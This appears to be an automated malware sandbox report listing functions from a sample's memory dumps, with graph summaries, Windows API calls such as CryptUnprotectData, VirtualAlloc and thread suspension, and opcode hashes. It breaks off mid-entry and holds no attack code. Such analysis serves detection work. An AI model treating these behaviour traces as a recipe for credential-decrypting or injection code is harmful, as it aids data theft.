• Not Executed
control_flow_graph nodes (id: address range, with call target or API where present):
• 602: 7ffd9bd011ce-7ffd9bd01289 call 7ffd9bcffd30
• 616: 7ffd9bd0128c-7ffd9bd0129d
• 617: 7ffd9bd0128b
• 618: 7ffd9bd012a0-7ffd9bd013fd CryptUnprotectData
• 619: 7ffd9bd0129f
• 622: 7ffd9bd01405-7ffd9bd01477
• 623: 7ffd9bd013ff
Edges: 602->616, 602->617, 616->618, 616->619, 617->616, 618->622, 618->623, 619->618, 623->622
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2960144078.00007FFD9BCF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9bcf0000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph nodes (id: address range, with API where present):
• 626: 7ffd9bd009fa-7ffd9bd012ea
• 628: 7ffd9bd012f1-7ffd9bd013fd CryptUnprotectData
• 629: 7ffd9bd01405-7ffd9bd01477
• 630: 7ffd9bd013ff
Edges: 626->628, 628->629, 628->630, 630->629
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2960144078.00007FFD9BCF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BCF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9bcf0000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                    • Opcode ID: 2bd4efd03632f78315136e67f76568ac93555d458cd5c824463634e6ae605252
                                                                                                                    • Instruction ID: eeb9bd5e6640dc3649f35e191ed0e577f831581e8955170453b1aa17e4078dba
                                                                                                                    • Opcode Fuzzy Hash: 2bd4efd03632f78315136e67f76568ac93555d458cd5c824463634e6ae605252
                                                                                                                    • Instruction Fuzzy Hash: 2942EE71A0991D8FEBA8EF58C8A5BA9B7B1FF54300F1442E9D01DD32A5DA356E81CF40
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e0f8c977c694649d3e24879e63977a1ecafe9d6df7e2b80b3db65d937d7e03d7
• Instruction ID: 6361322928e21550487851039ac1bce49d262e211b0b44d7875b908e080835c5
• Opcode Fuzzy Hash: e0f8c977c694649d3e24879e63977a1ecafe9d6df7e2b80b3db65d937d7e03d7
• Instruction Fuzzy Hash: DBA10174A19A4D8FE795DFA8C8757A97BE0FF96310F4002BAD04DD32E6CA782811C741

Control-flow Graph (graph omitted; the function calls VirtualProtect)
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b78d000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: a0282fb14130afc70ab4beb60501d20334f6e3938f95b7e11968cf6efddb6d14
• Instruction ID: 4457fc6d92cc7d9464bc700c463eea08699c14b09a7dc16981b61f442b0aa023
• Opcode Fuzzy Hash: a0282fb14130afc70ab4beb60501d20334f6e3938f95b7e11968cf6efddb6d14
• Instruction Fuzzy Hash: 65518D70D0864D8FDB54DFA8C885BEDBBF0FB56310F1042AAD449E3262DB74A885CB80

Control-flow Graph (graph omitted)
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID: TH_H
• API String ID: 0-1585845160
• Opcode ID: 50d8e28ed4326b919325f575b6b63e780eeaedeeaa0952747bdef0ff3303790b
• Instruction ID: 5454be62bf8dcaf253f8ec45232e9a2ce04b98750ff262aef4653d0cbb733aca
• Opcode Fuzzy Hash: 50d8e28ed4326b919325f575b6b63e780eeaedeeaa0952747bdef0ff3303790b
• Instruction Fuzzy Hash: 00F12F71E19A5D9FDB98EF58C4A5BB8B7A1FF54300F4442BED01DA32A2DE346980CB41

Control-flow Graph (graph omitted; the function calls ResumeThread)
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
• Instruction ID: e48b75a810cad9d39b3c763df9f4bef7b2fcddf86e84aaf9a64b9c552ae663c9
• Opcode Fuzzy Hash: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
• Instruction Fuzzy Hash: 22517D3090D79C8FDB56DFA8C865AE9BFF0EF16310F1441ABD049DB2A2DA359846CB11

Control-flow Graph (graph omitted; the function calls SuspendThread)
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: SuspendThread
• String ID:
• API String ID: 3178671153-0
• Opcode ID: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
• Instruction ID: 744c7afa4209507a184df4cb0544d0ba4d2585f49e86659d2fac44981b7f6b6e
• Opcode Fuzzy Hash: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
• Instruction Fuzzy Hash: BC413C70E0864C8FDB98DFA8C895AEDBBF0FF5A310F10416AD04DE7292DA74A845CB41

Control-flow Graph (graph omitted; the function calls GetFileAttributesW)
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
• Instruction ID: 0bb66de4614c0c6de665e0e0497a669237762d4a137e78935dac070dec4c094b
• Opcode Fuzzy Hash: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
• Instruction Fuzzy Hash: D941F870E08A1C8FDB98DF98D895BEDBBF1EB59310F10416ED049E7252DA71A846CB44

Control-flow Graph (graph omitted)
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID: TH_H
• API String ID: 0-1585845160
• Opcode ID: 95ea4ce09d4654553ef473af572b5fbb334f371dc7260009d0e920075b2de845
• Instruction ID: 671f946221129397d788c9df56e9021a31b753f5d7159e3ccf81459dceac4783
• Opcode Fuzzy Hash: 95ea4ce09d4654553ef473af572b5fbb334f371dc7260009d0e920075b2de845
• Instruction Fuzzy Hash: A6C15E71A18A5D9FDBA8EF58C4A5BB8B7A1FF54300F4442BDD01DD32A6DE346980CB41

Control-flow Graph (graph omitted; the function calls VirtualAlloc)
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b78d000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: eda584647d28daa6d9b1280bfef5b5acf336a8d12755e006344db384b0aefcf7
• Instruction ID: c21d3e8f22fbc7788f38a65508ebf7959bf29b694d1a014f94112a1b701deab8
• Opcode Fuzzy Hash: eda584647d28daa6d9b1280bfef5b5acf336a8d12755e006344db384b0aefcf7
• Instruction Fuzzy Hash: 2D512970908A5C8FDF94EF68C845BE9BBF1FB69310F1041AAD04DE3255DB75A9858B80

Control-flow Graph (graph omitted; the function calls CloseHandle)
APIs
Memory Dump Source
• Source File: 0000000E.00000002.2954438832.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b930000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
• Instruction ID: 58b8bef947dcb42319759f4f69d6e2050b5f14eefce13ebf0a88e385d3b821be
• Opcode Fuzzy Hash: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
• Instruction Fuzzy Hash: 9C416D70D0865C8FDB59DFA8C895BEDBBF0EF5A310F1041AAD049E7292DA74A985CB01

Control-flow Graph (graph omitted; no API calls in this function)
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214
• Opcode ID: ea17aa5ace0bc0fa617e74031baabf0598c13ad7f6588423e8a96fdf91119bef
• Instruction ID: 1cb0b6c423e1672268bbcae2c64e1ca738b2615d0b52699088e973efba882016
• Opcode Fuzzy Hash: ea17aa5ace0bc0fa617e74031baabf0598c13ad7f6588423e8a96fdf91119bef
• Instruction Fuzzy Hash: DF117F31A09A4D9FDF55EF58C8949E97BB0FF68306F0501AAD419C71A6CA34A945CB40
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID: o
• API String ID: 0-252678980
• Opcode ID: d70d75d8225c3b2abc160c996b0b7c1841f55d1dc7e6c2fe93f8a0aa497fa58b
• Instruction ID: d0eb7fa26f78906db95ec54eced7ee871cefe94474bc2e128d6165b01cc86845
• Opcode Fuzzy Hash: d70d75d8225c3b2abc160c996b0b7c1841f55d1dc7e6c2fe93f8a0aa497fa58b
• Instruction Fuzzy Hash: 81113D70E0665E8FEB78DB08C8A46EC73B2EB54316F0042FAD51DA62A5CA741E858F44
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID: ;
• API String ID: 0-1661535913
• Opcode ID: e812c0081c9786c8ca7fba0279781140ab7f35c452d8749dce580e59640458b4
• Instruction ID: 45673076753de59ebdb980709c74b761236c6891a1893557ada8d3dc48ad4846
• Opcode Fuzzy Hash: e812c0081c9786c8ca7fba0279781140ab7f35c452d8749dce580e59640458b4
• Instruction Fuzzy Hash: A401ED7090962D8BEBB9DF44C4587B873B6EB58305F5042ADC01D922B1CB786A89CF05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;
                                                                                                                    • API String ID: 0-1661535913
                                                                                                                    • Opcode ID: 77c35d95848e40947d6d23c5bcdca9377130eda43ceb752806506bc9a48850f4
                                                                                                                    • Instruction ID: 14770f830e7bb27c4d176587f52360a3d7454a8692a61967b59054ba6481e59e
                                                                                                                    • Opcode Fuzzy Hash: 77c35d95848e40947d6d23c5bcdca9377130eda43ceb752806506bc9a48850f4
                                                                                                                    • Instruction Fuzzy Hash: 19D0677090962D9ADBA4EF0484547A876A5EB18340F5001AD950DD22A1CB345B84CB55
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd5d8637e151de96718940a6658645c074d320e57146f1970fa1bca60f14724a
                                                                                                                    • Instruction ID: eab13bef9d4b532c3e4592ed2a7850ba5529b5104f5c71f1be0880f7a7ebde62
                                                                                                                    • Opcode Fuzzy Hash: cd5d8637e151de96718940a6658645c074d320e57146f1970fa1bca60f14724a
                                                                                                                    • Instruction Fuzzy Hash: 1EF1C271A09A1D8FEBA4DF58C895BA9B7B1FF58301F1442E9D01DD32A2DA356E81CF40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 75d4dbd6d4cc6b1a8b8f0e29a6234976783061b6bdbb107a8b311a94bc937970
                                                                                                                    • Instruction ID: 9306e743849e08ebf5af1ac733f20a1b9da0af35d69810d61ae72cdbe2abd134
                                                                                                                    • Opcode Fuzzy Hash: 75d4dbd6d4cc6b1a8b8f0e29a6234976783061b6bdbb107a8b311a94bc937970
                                                                                                                    • Instruction Fuzzy Hash: 67810331B1DA0A4FDB68EB58D491975B3E2FFA835071103BDD05EC76A6DE24F8468780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d9c8a64c34e4f6e637007d1a79f6b43ef7c4a18f36cbbf440c176d75e03186b1
                                                                                                                    • Instruction ID: 2d7ea12cdde367ec7a44e9c7d8fd3d8877591dd5083fc699e3ed3452b0a68967
                                                                                                                    • Opcode Fuzzy Hash: d9c8a64c34e4f6e637007d1a79f6b43ef7c4a18f36cbbf440c176d75e03186b1
                                                                                                                    • Instruction Fuzzy Hash: 1881D672B09A0D4FDFA8DA5CD465AB977E1EBE4341F05037AD00DD32B5DE21AC468780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8ad7e6ea7664f063fd3dacd997ba7c4fbe0b35615a967a7d99f71f4191ff7c3d
                                                                                                                    • Instruction ID: d154361371716cccae1b0038eb027f2ba88ec406d178ec3d138cfbf9a3e614a6
                                                                                                                    • Opcode Fuzzy Hash: 8ad7e6ea7664f063fd3dacd997ba7c4fbe0b35615a967a7d99f71f4191ff7c3d
                                                                                                                    • Instruction Fuzzy Hash: 6D51E271E09A4D8BDB58CF6888616AD77A2FFD8340F15037AD04DEB3B2CE3469058751
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a955843b2c1fc7978365ead811dfa0911ae4772a94f87f57507f5fdce6bb7310
                                                                                                                    • Instruction ID: 5d7a074d3533e5315204aa97d90c1fea699f39b9f406c0f3993c6501ea063a60
                                                                                                                    • Opcode Fuzzy Hash: a955843b2c1fc7978365ead811dfa0911ae4772a94f87f57507f5fdce6bb7310
                                                                                                                    • Instruction Fuzzy Hash: 61413B31B19F4E4FDF98EB6C8864A7977D1FF94390B4002FAD05DC72A6DD24A8098740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 83439903dd3318e057bbef6155ef5e49ee4dcda958ab442b2073c02f4d007b10
                                                                                                                    • Instruction ID: a36b231d6a2f9dc774c3c0775785aaf66e7cf588732ac575d1c1832954f77000
                                                                                                                    • Opcode Fuzzy Hash: 83439903dd3318e057bbef6155ef5e49ee4dcda958ab442b2073c02f4d007b10
                                                                                                                    • Instruction Fuzzy Hash: 1E510431A0DB8D4FDB95DF68D8642AA7BF1FFC9350F0903BBE049D72A6DA2459058381
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ae83dd3e4c7b9fd04125ae946ea97fafe9e43753ed8725e5de3a82ff646b6093
                                                                                                                    • Instruction ID: 4f2fc06cb17b1b0591b1c35c7f6522e311ab71540355e03fc6dc506817a5110b
                                                                                                                    • Opcode Fuzzy Hash: ae83dd3e4c7b9fd04125ae946ea97fafe9e43753ed8725e5de3a82ff646b6093
                                                                                                                    • Instruction Fuzzy Hash: E6516671E09A5D8FEB94DB9C88657ACBBF1FB98340F0503B9D01DE36A2DE3469448B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aee3df722af2478a074b70bc764915363334c44ffe5889c315d9ce7cdfc3ec35
                                                                                                                    • Instruction ID: 2c47f556e9f27c4a18050d2e4ce998d320e3004242aaf512cd9cacb555ba012d
                                                                                                                    • Opcode Fuzzy Hash: aee3df722af2478a074b70bc764915363334c44ffe5889c315d9ce7cdfc3ec35
                                                                                                                    • Instruction Fuzzy Hash: 5D411871B0EF4D0BEB789A9C886537977E1EBD5780F15437EE409D32B2DD11AD0A8281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b3c41bbb7cb91c5dfc3266d48d9d14bf0524158bc1383654ec781608c40a67ef
                                                                                                                    • Instruction ID: ea04365149ec15f1f871fdc516db2030394d9e5504051d4b2b7951068ade59d2
                                                                                                                    • Opcode Fuzzy Hash: b3c41bbb7cb91c5dfc3266d48d9d14bf0524158bc1383654ec781608c40a67ef
                                                                                                                    • Instruction Fuzzy Hash: FD311771B0EF4E0BEB789AA8486577577E2EFD5781F05037EE408D32B2DD10AC098681
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B797000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B797000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b797000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 821ca032bb52a4a699b65e1d1c43d91ba65d27c016479e5f4ad5f9a3857aa1cc
                                                                                                                    • Instruction ID: b15b0a8e75617972f33aab821eab676b2e643f76a2660142569f2e12d2b33a32
                                                                                                                    • Opcode Fuzzy Hash: 821ca032bb52a4a699b65e1d1c43d91ba65d27c016479e5f4ad5f9a3857aa1cc
                                                                                                                    • Instruction Fuzzy Hash: 4A51B030A08A4D8FCF84DF98D494AED7BF1FF58350B0502A6E409E7261DB34E990CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55b102b2bc98d728ccce240bcdcdfcd5d1ac1c3cc096417b72f8ad6dd6f15979
                                                                                                                    • Instruction ID: 766325ac71094e47a8f7f9ebcd31083fce9fabeda9d82f353b4eb34ec8e9776c
                                                                                                                    • Opcode Fuzzy Hash: 55b102b2bc98d728ccce240bcdcdfcd5d1ac1c3cc096417b72f8ad6dd6f15979
                                                                                                                    • Instruction Fuzzy Hash: 30312661B0EF4E0FDFA9E66C5464A657BD2EF9839070003FAD04DC71B6ED14AD098380
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a27e8a371ea2435067cda352c7bf542d51084080ca40d4ade9f1118371a78fd1
                                                                                                                    • Instruction ID: dd0e2ec214974c457baf984465622a33e6bb64ab3e4be28871f7f7bd3d630df1
                                                                                                                    • Opcode Fuzzy Hash: a27e8a371ea2435067cda352c7bf542d51084080ca40d4ade9f1118371a78fd1
                                                                                                                    • Instruction Fuzzy Hash: E9312731B19A4E4FDB99EB6C84A056277E2FFD8344B1643B6D40CC71ABDA29E809C340
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80fab7bc5d434592a16f431197f56b9703bdfd5a33620a7a84119508474bb560
                                                                                                                    • Instruction ID: e9560122420310532704ccc0cf79359ca715518b16641e652d902c97dc2e5586
                                                                                                                    • Opcode Fuzzy Hash: 80fab7bc5d434592a16f431197f56b9703bdfd5a33620a7a84119508474bb560
                                                                                                                    • Instruction Fuzzy Hash: 0E313031A08A0C8FDF55EBA8D855DECB7F1EFA5311B14426AD00ADB165DA31A986CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B797000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B797000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b797000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 72469330ff26575ccbc08b343fc44997f7e7e1fa7f8021576d5a04cff5a07236
                                                                                                                    • Instruction ID: 420d0030e7c86498e56a9d0af730bb4925bfdad49289e47efd135320ccdac1f0
                                                                                                                    • Opcode Fuzzy Hash: 72469330ff26575ccbc08b343fc44997f7e7e1fa7f8021576d5a04cff5a07236
                                                                                                                    • Instruction Fuzzy Hash: 71113232D0E64D8FEB208F54D8211FD7BB1EF86314F0642B6E51CD21E6DB3426168780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b780000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd719295f162f2e917c9a450e3318f4812dbed37077ee3e0a64da2992e8a7b5a
                                                                                                                    • Instruction ID: 4f7ee495eb8cccf5d908da68d99fdb874235554a8abb585acc104ab75adb5f02
                                                                                                                    • Opcode Fuzzy Hash: fd719295f162f2e917c9a450e3318f4812dbed37077ee3e0a64da2992e8a7b5a
                                                                                                                    • Instruction Fuzzy Hash: FF110836B0EB8D4EE7229A64C8602F97B70EB52312F0646B3C051DB1F2DA3816098B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2951114625.00007FFD9B7CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7CA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9b7ca000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38e27decbe3e48233ca9876e26b823e83686394aa675a54c271970f7059e00bf
                                                                                                                    • Instruction ID: ab146c4735605d5e10af2b87af977d8a883c8a61e9eb0517f1946119771da1ab
